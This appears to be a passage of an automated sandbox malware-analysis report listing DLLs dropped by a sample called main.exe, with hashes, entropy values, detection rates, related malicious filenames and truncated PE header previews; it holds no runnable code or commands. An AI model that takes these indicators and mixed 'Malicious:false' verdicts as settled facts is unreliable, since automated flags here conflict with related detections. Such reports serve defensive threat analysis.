                                                                                                                                                                                                                                                      Size (bytes):11264
                                                                                                                                                                                                                                                      Entropy (8bit):4.640339306680604
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:dLklddyTHThob0q/tJRrlDfNYSOcqgYCWt:ZgcdZq/JJD6gRWt
                                                                                                                                                                                                                                                      MD5:BCD8CAAF9342AB891BB1D8DD45EF0098
                                                                                                                                                                                                                                                      SHA1:EE7760BA0FF2548F25D764F000EFBB1332BE6D3E
                                                                                                                                                                                                                                                      SHA-256:78725D2F55B7400A3FCAFECD35AF7AEB253FBC0FFCDF1903016EB0AABD1B4E50
                                                                                                                                                                                                                                                      SHA-512:8B6FB53AECB514769985EBFDAB1B3C739024597D9C35905E04971D5422256546F7F169BF98F9BAF7D9F42A61CFF3EE7A20664989D3000773BF5EDA10CB3A0C24
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                                                                                                                      • Filename: chos.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      • Filename: ihost.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      • Filename: shost.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      • Filename: lz4wnSavmK.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      • Filename: WVuXCNNYG0.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      • Filename: dipwo1iToJ.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      • Filename: ROh2ijuEpr.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      • Filename: zed.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      • Filename: back.ps1, Detection: malicious, Browse
                                                                                                                                                                                                                                                      • Filename: zed.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r^J.6?$.6?$.6?$.?G..2?$.dJ%.4?$.}G%.5?$.6?%..?$.dJ!.<?$.dJ .>?$.dJ'.5?$..J,.7?$..J$.7?$..J..7?$..J&.7?$.Rich6?$.........................PE..d...Y..f.........." ................P........................................p............`..........................................'......0(..d....P.......@...............`..(....!...............................!..8............ ...............................text............................... ..`.rdata..Z.... ......................@..@.data...H....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......(..............@..@.reloc..(....`.......*..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):13824
                                                                                                                                                                                                                                                      Entropy (8bit):5.0194545642425075
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:4t/1nCuqaL0kt7AznuRmceS4lDFhAlcqgcLg:F/k1ACln4lDogcLg
                                                                                                                                                                                                                                                      MD5:F19CB847E567A31FAB97435536C7B783
                                                                                                                                                                                                                                                      SHA1:4C8BFE404AF28C1781740E7767619A5E2D2FF2B7
                                                                                                                                                                                                                                                      SHA-256:1ECE1DC94471D6977DBE2CEEBA3764ADF0625E2203D6257F7C781C619D2A3DAD
                                                                                                                                                                                                                                                      SHA-512:382DC205F703FC3E1F072F17F58E321E1A65B86BE7D9D6B07F24A02A156308A7FEC9B1A621BA1F3428FD6BB413D14AE9ECB2A2C8DD62A7659776CFFDEBB6374C
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.:...:...:...3.j.>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...........................PE..d...Z..f.........." ................P.....................................................`..........................................8......H9..d....`.......P..L............p..(....1...............................1..8............0...............................text...h........................... ..`.rdata..r....0......................@..@.data...H....@.......,..............@....pdata..L....P......................@..@.rsrc........`.......2..............@..@.reloc..(....p.......4..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):13312
                                                                                                                                                                                                                                                      Entropy (8bit):5.037456384995606
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:st/1nCuqaL0ktPMn1ENe3erKr5br0YbsiDw6a9lkOcqgRGd:p/kpMIodrXbsiDS95gRGd
                                                                                                                                                                                                                                                      MD5:DC14677EA8A8C933CC41F9CCF2BEDDC1
                                                                                                                                                                                                                                                      SHA1:A6FB87E8F3540743097A467ABE0723247FDAF469
                                                                                                                                                                                                                                                      SHA-256:68F081E96AE08617CF111B21EDED35C1774A5EF1223DF9A161C9445A78F25C73
                                                                                                                                                                                                                                                      SHA-512:3ABA4CFCBBE4B350AB3230D488BD75186427E3AAAF38D19E0E1C7330F16795AD77FB6E26FF39AF29EAF4F5E8C42118CB680F90AFBFCA218AEDA64DC444675BA2
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.:...:...:...3.j.>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...........................PE..d...Z..f.........." ................P.....................................................`......................................... 8.......8..d....`.......P..d............p..(....1...............................1..8............0...............................text............................... ..`.rdata.......0......................@..@.data...H....@.......*..............@....pdata..d....P.......,..............@..@.rsrc........`.......0..............@..@.reloc..(....p.......2..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):14336
                                                                                                                                                                                                                                                      Entropy (8bit):5.09191874780435
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:rMVsiXeqVb0lIb0Pj5Jdfpm68WZDInU282tacqgYLg:rM7ali0Pj5JxCaDuUlgYLg
                                                                                                                                                                                                                                                      MD5:C09BB8A30F0F733C81C5C5A3DAD8D76D
                                                                                                                                                                                                                                                      SHA1:46FD3BA87A32D12F4EE14601D1AD73B78EDC81D1
                                                                                                                                                                                                                                                      SHA-256:8A1B751DB47CE7B1D3BD10BEBFFC7442BE4CFB398E96E3B1FF7FB83C88A8953D
                                                                                                                                                                                                                                                      SHA-512:691AC74FAE930E9CEABE782567EFB99C50DD9B8AD607DD7F99A5C7DF2FA2BEB7EDFE2EBB7095A72DA0AE24E688FBABD340EAE8B646D5B8C394FEE8DDD5E60D31
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r^:.6?T.6?T.6?T.?G..2?T.dJU.4?T.}GU.5?T.6?U..?T.dJQ.<?T.dJP.>?T.dJW.5?T..J\.7?T..JT.7?T..J..7?T..JV.7?T.Rich6?T.........................PE..d...X..f.........." ................P.....................................................`.........................................`8.......8..d....`.......P..(............p..(....1...............................1..8............0...............................text............................... ..`.rdata..6....0....... ..............@..@.data...x....@......................@....pdata..(....P.......0..............@..@.rsrc........`.......4..............@..@.reloc..(....p.......6..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):36352
                                                                                                                                                                                                                                                      Entropy (8bit):6.541423493519083
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:f/UlZA5PUEllvxL/7v/iKBt5ByU0xGitqzSEkxGG7+tpKHb/LZ7fr52EkifcMxme:klcR7JriEbwDaS4j990th9VDBV
                                                                                                                                                                                                                                                      MD5:0AB25F99CDAACA6B11F2ECBE8223CAD5
                                                                                                                                                                                                                                                      SHA1:7A881B3F84EF39D97A31283DE6D7B7AE85C8BAE6
                                                                                                                                                                                                                                                      SHA-256:6CE8A60D1AB5ADC186E23E3DE864D7ADF6BDD37E3B0C591FA910763C5C26AF60
                                                                                                                                                                                                                                                      SHA-512:11E89EEF34398DF3B144A0303E08B3A4CAF41A9A8CA618C18135F561731F285F8CF821D81179C2C45F6EEB0E496D9DD3ECF6FF202A3C453C80AFEF8582D06C17
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r^J.6?$.6?$.6?$.?G..2?$.dJ%.4?$.}G%.5?$.6?%..?$.dJ!.<?$.dJ .>?$.dJ'.5?$..J,.7?$..J$.7?$..J..7?$..J&.7?$.Rich6?$.........................PE..d...V..f.........." .....H...H......P.....................................................`.........................................p...........d...............................0......................................8............`...............................text...xG.......H.................. ..`.rdata.."6...`...8...L..............@..@.data...H...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..0...........................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):15360
                                                                                                                                                                                                                                                      Entropy (8bit):5.367749645917753
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:YiJBj5fq/Rk0kPLhOZ3UucCWuSKPEkA2bD9JXx03cqg5YUMLgs:/k1kTMZEjCWNaA2DTx0g5YUMLg
                                                                                                                                                                                                                                                      MD5:B6EA675C3A35CD6400A7ECF2FB9530D1
                                                                                                                                                                                                                                                      SHA1:0E41751AA48108D7924B0A70A86031DDE799D7D6
                                                                                                                                                                                                                                                      SHA-256:76EF4C1759B5553550AB652B84F8E158BA8F34F29FD090393815F06A1C1DC59D
                                                                                                                                                                                                                                                      SHA-512:E31FD33E1ED6D4DA3957320250282CFD9EB3A64F12DE4BD2DFE3410F66725164D96B27CAA34C501D1A535A5A2442D5F070650FD3014B4B92624EE00F1C3F3197
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.:...:...:...3.z.>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...........................PE..d...V..f.........." ......... ......P.....................................................`..........................................9......$:..d....`.......P...............p..(....1...............................1..8............0.. ............................text............................... ..`.rdata.......0......."..............@..@.data...8....@.......2..............@....pdata.......P.......4..............@..@.rsrc........`.......8..............@..@.reloc..(....p.......:..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16384
                                                                                                                                                                                                                                                      Entropy (8bit):5.41148259289073
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:w3d9FkHaz0EJvrj+CYuz7ucc9dG7otDr22KcqgOiewZjW:YkHEJzj+X6769lDzagO/w
                                                                                                                                                                                                                                                      MD5:F14E1AA2590D621BE8C10321B2C43132
                                                                                                                                                                                                                                                      SHA1:FD84D11619DFFDF82C563E45B48F82099D9E3130
                                                                                                                                                                                                                                                      SHA-256:FCE70B3DAFB39C6A4DB85D2D662CB9EB9C4861AA648AD7436E7F65663345D177
                                                                                                                                                                                                                                                      SHA-512:A86B9DF163007277D26F2F732ECAB9DBCA8E860F8B5809784F46702D4CEA198824FDEF6AB98BA7DDC281E8791C10EABA002ABDA6F975323B36D5967E0443C1E4
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d...W..f.........." ....."... ......P.....................................................`.........................................pI.......J..d....p.......`..................(....B...............................B..8............@...............................text...( .......".................. ..`.rdata..<....@.......&..............@..@.data...H....P.......6..............@....pdata.......`.......8..............@..@.rsrc........p.......<..............@..@.reloc..(............>..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):20992
                                                                                                                                                                                                                                                      Entropy (8bit):6.041302713678401
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:kUX0JfbRz5MLZA0nmwzMDYpJgLa0Mp8NDBcxgprAM:6NbRzWXwDqgLa1uBfP
                                                                                                                                                                                                                                                      MD5:B127CAE435AEB8A2A37D2A1BC1C27282
                                                                                                                                                                                                                                                      SHA1:2A7BF8BF7F24B2381370BA6B41FB640EE42BDCCD
                                                                                                                                                                                                                                                      SHA-256:538B1253B5929254ED92129FA0957DB26CDDF34A8372BA0BF19D20D01549ADA3
                                                                                                                                                                                                                                                      SHA-512:4FE027E46D5132CA63973C67BD5394F2AC74DD4BBCFE93CB16136FAB4B6BF67BECB5A0D4CA359FF9426DA63CA81F793BBF1B79C8A9D8372C53DCB5796D17367E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d...W..f.........." .....$...0......P.....................................................`.........................................0Y.......Y..d............p..................0....Q...............................R..8............@...............................text....".......$.................. ..`.rdata.......@... ...(..............@..@.data...H....`.......H..............@....pdata.......p.......J..............@..@.rsrc................N..............@..@.reloc..0............P..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):24576
                                                                                                                                                                                                                                                      Entropy (8bit):6.530656045206549
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:cEDwUBi9SPu71omZXmrfXA+UA10ol31tuXVYdAgYj:FsUBXmoEXmrXA+NNxWFYfo
                                                                                                                                                                                                                                                      MD5:2E15AA6F97ED618A3236CFA920988142
                                                                                                                                                                                                                                                      SHA1:A9D556D54519D3E91FA19A936ED291A33C0D1141
                                                                                                                                                                                                                                                      SHA-256:516C5EA47A7B9A166F2226ECBA79075F1A35EFFF14D87E00006B34496173BB78
                                                                                                                                                                                                                                                      SHA-512:A6C75C4A285753CC94E45500E8DD6B6C7574FB7F610FF65667F1BEC8D8B413FC10514B7D62F196C2B8D017C308C5E19E2AEF918021FA81D0CB3D8CED37D8549A
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.:...:...:...3.j.>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...........................PE..d...W..f.........." .....$...>............................................................`..........................................h.......i..d...............................0....a...............................a..8............@...............................text....#.......$.................. ..`.rdata..:-...@.......(..............@..@.data...H....p.......V..............@....pdata...............X..............@..@.rsrc................\..............@..@.reloc..0............^..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):12288
                                                                                                                                                                                                                                                      Entropy (8bit):4.7080156150187396
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:lF/1n7Guqaj0ktfEJwX1fYwCODR3lncqg0Gd6l:RGXkJEm1feODxDg0Gd6
                                                                                                                                                                                                                                                      MD5:40390F2113DC2A9D6CFAE7127F6BA329
                                                                                                                                                                                                                                                      SHA1:9C886C33A20B3F76B37AA9B10A6954F3C8981772
                                                                                                                                                                                                                                                      SHA-256:6BA9C910F755885E4D356C798A4DD32D2803EA4CFABB3D56165B3017D0491AE2
                                                                                                                                                                                                                                                      SHA-512:617B963816838D649C212C5021D7D0C58839A85D4D33BBAF72C0EC6ECD98B609080E9E57AF06FA558FF302660619BE57CC974282826AB9F21AE0D80FBAA831A1
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d...X..f.........." ................P.....................................................`..........................................8.......8..d....`.......P..X............p..(....1...............................1..8............0...............................text............................... ..`.rdata.......0......................@..@.data...H....@.......&..............@....pdata..X....P.......(..............@..@.rsrc........`.......,..............@..@.reloc..(....p......................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):12800
                                                                                                                                                                                                                                                      Entropy (8bit):5.159963979391524
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:kblRgfeqfz0RP767fB4A84DgVD6eDcqgzbkLgmf:BwRj67p84Dg6eVgzbkLgmf
                                                                                                                                                                                                                                                      MD5:899895C0ED6830C4C9A3328CC7DF95B6
                                                                                                                                                                                                                                                      SHA1:C02F14EBDA8B631195068266BA20E03210ABEABC
                                                                                                                                                                                                                                                      SHA-256:18D568C7BE3E04F4E6026D12B09B1FA3FAE50FF29AC3DEAF861F3C181653E691
                                                                                                                                                                                                                                                      SHA-512:0B4C50E40AF92BC9589668E13DF417244274F46F5A66E1FC7D1D59BC281969BA319305BECEA119385F01CC4603439E4B37AFA2CF90645425210848A02839E3E7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r^..6?..6?..6?..?G..2?..dJ..4?..}G..5?..6?...?..dJ..<?..dJ..>?..dJ..5?...J..7?...J..7?...Jk.7?...J..7?..Rich6?..................PE..d...Y..f.........." ................P.....................................................`..........................................8......x9..d....`.......P..d............p..(....1...............................1..8............0...............................text............................... ..`.rdata.......0......................@..@.data...H....@.......(..............@....pdata..d....P.......*..............@..@.rsrc........`......................@..@.reloc..(....p.......0..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):14848
                                                                                                                                                                                                                                                      Entropy (8bit):5.270418334522813
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:vktJ1gifqQGRk0IP73AdXdmEEEEEm9uhiFEQayDZVMcqgnF6+6Lg:vkdU1ID3AdXd49urQPDggnUjLg
                                                                                                                                                                                                                                                      MD5:C4C525B081F8A0927091178F5F2EE103
                                                                                                                                                                                                                                                      SHA1:A1F17B5EA430ADE174D02ECC0B3CB79DBF619900
                                                                                                                                                                                                                                                      SHA-256:4D86A90B2E20CDE099D6122C49A72BAE081F60EB2EEA0F76E740BE6C41DA6749
                                                                                                                                                                                                                                                      SHA-512:7C06E3E6261427BC6E654B2B53518C7EAA5F860A47AE8E80DC3F8F0FED91E122CB2D4632188DC44123FB759749B5425F426CD1153A8F84485EF0491002B26555
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r^z.6?..6?..6?..?G..2?..dJ..4?..}G..5?..6?...?..dJ..<?..dJ..>?..dJ..5?...J..7?...J..7?...J..7?...J..7?..Rich6?..........................PE..d...Y..f.........." ......... ......P.....................................................`.........................................`9.......:..d....`.......P...............p..(....1...............................1..8............0.. ............................text............................... ..`.rdata.......0....... ..............@..@.data........@.......0..............@....pdata.......P.......2..............@..@.rsrc........`.......6..............@..@.reloc..(....p.......8..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):56832
                                                                                                                                                                                                                                                      Entropy (8bit):4.231032526864278
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:0qcmHBeNL1dO/qHkpnYcZiGKdZHDLY84vnKAnK2rZA21agVF:fEiqHHx4vZDV
                                                                                                                                                                                                                                                      MD5:F9E266F763175B8F6FD4154275F8E2F0
                                                                                                                                                                                                                                                      SHA1:8BE457700D58356BC2FA7390940611709A0E5473
                                                                                                                                                                                                                                                      SHA-256:14D2799BE604CBDC668FDE8834A896EEE69DAE0E0D43B37289FCCBA35CEF29EC
                                                                                                                                                                                                                                                      SHA-512:EB3E37A3C3FF8A65DEF6FA20941C8672A8197A41977E35AE2DC6551B5587B84C2703758320559F2C93C0531AD5C9D0F6C36EC5037669DC5CE78EB3367D89877B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........PK..1%..1%..1%..I...1%.D$..1%.I$..1%..1$..1%.D ..1%.D!..1%.D&..1%..D-..1%..D%..1%..D...1%..D'..1%.Rich.1%.........................PE..d...X..f.........." .....6...................................................0............`.................................................\...d...............l............ ..0... ...............................@...8............P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data...H...........................@....pdata..l...........................@..@.rsrc...............................@..@.reloc..0.... ......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):57344
                                                                                                                                                                                                                                                      Entropy (8bit):4.252429732285762
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:J4cmHBeIzNweVy/CHkRnYcZiGKdZHDLq80vnKAnKBrZGsURygUX:GEO6CHnX0vZb7
                                                                                                                                                                                                                                                      MD5:DECF524B2D53FCD7D4FA726F00B3E5FC
                                                                                                                                                                                                                                                      SHA1:E87C6ED4004F2772B888C5B5758AA75FE99D2F6F
                                                                                                                                                                                                                                                      SHA-256:58F7053EE70467D3384C73F299C0DFD63EEF9744D61D1980D9D2518974CA92D4
                                                                                                                                                                                                                                                      SHA-512:EAFF4FD80843743E61CE635FBADF4E5D9CF2C3E97F3C48350BD9E755F4423AC6867F9FE8746BD5C54E1402B18E8A55AEEF7ACA098C7CF4186DC4C1235EB35DF2
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........PK..1%..1%..1%..I...1%.D$..1%.I$..1%..1$..1%.D ..1%.D!..1%.D&..1%..D-..1%..D%..1%..D...1%..D'..1%.Rich.1%.........................PE..d...X..f.........." .....8...................................................0............`.....................................................d............................ ..0... ...............................@...8............P...............................text...X7.......8.................. ..`.rdata......P.......<..............@..@.data...H...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..0.... ......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):10240
                                                                                                                                                                                                                                                      Entropy (8bit):4.690163963718492
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:Yddz2KTnThIz0qfteRY4zp+D3PLui8p1cqgHCWt:k2E9RqfCXp+D3juRpLgiWt
                                                                                                                                                                                                                                                      MD5:80BB1E0E06ACAF03A0B1D4EF30D14BE7
                                                                                                                                                                                                                                                      SHA1:B20CAC0D2F3CD803D98A2E8A25FBF65884B0B619
                                                                                                                                                                                                                                                      SHA-256:5D1C2C60C4E571B88F27D4AE7D22494BED57D5EC91939E5716AFA3EA7F6871F6
                                                                                                                                                                                                                                                      SHA-512:2A13AB6715B818AD62267AB51E55CD54714AEBF21EC9EA61C2AEFD56017DC84A6B360D024F8682A2E105582B9C5FE892ECEBD2BEF8A492279B19FFD84BC83FA5
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........@................../....../...../......+.......*......-......&....................,....Rich...........................PE..d...X..f.........." ................P........................................p............`.........................................0'.......'..P....P.......@...............`..(....!...............................!..8............ ...............................text............................... ..`.rdata....... ......................@..@.data...H....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..(....`.......&..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):22016
                                                                                                                                                                                                                                                      Entropy (8bit):6.1215844022564285
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:nUX0JfbRwUtPMbNv37t6K5jwbDEpJgLa0Mp8xCkgJrAm:jNbRw8EbxwKBwbD+gLa1nh
                                                                                                                                                                                                                                                      MD5:3727271FE04ECB6D5E49E936095E95BC
                                                                                                                                                                                                                                                      SHA1:46182698689A849A8C210A8BF571D5F574C6F5B1
                                                                                                                                                                                                                                                      SHA-256:3AF5B35DCD5A3B6C7E88CEE53F355AAFFF40F2C21DABD4DE27DBB57D1A29B63B
                                                                                                                                                                                                                                                      SHA-512:5BED1F4DF678FE90B8E3F1B7C4F68198463E579209B079CB4A40DCAC01CE26AA2417DBE029B196F6F2C6AFAD560E2D1AF9F089ABE37EAD121CA10EE69D9659ED
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d...W..f.........." .....(...0......P.....................................................`.........................................0Y.......Y..d............p..................0....Q...............................R..8............@...............................text...H'.......(.................. ..`.rdata.......@... ...,..............@..@.data...H....`.......L..............@....pdata.......p.......N..............@..@.rsrc................R..............@..@.reloc..0............T..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
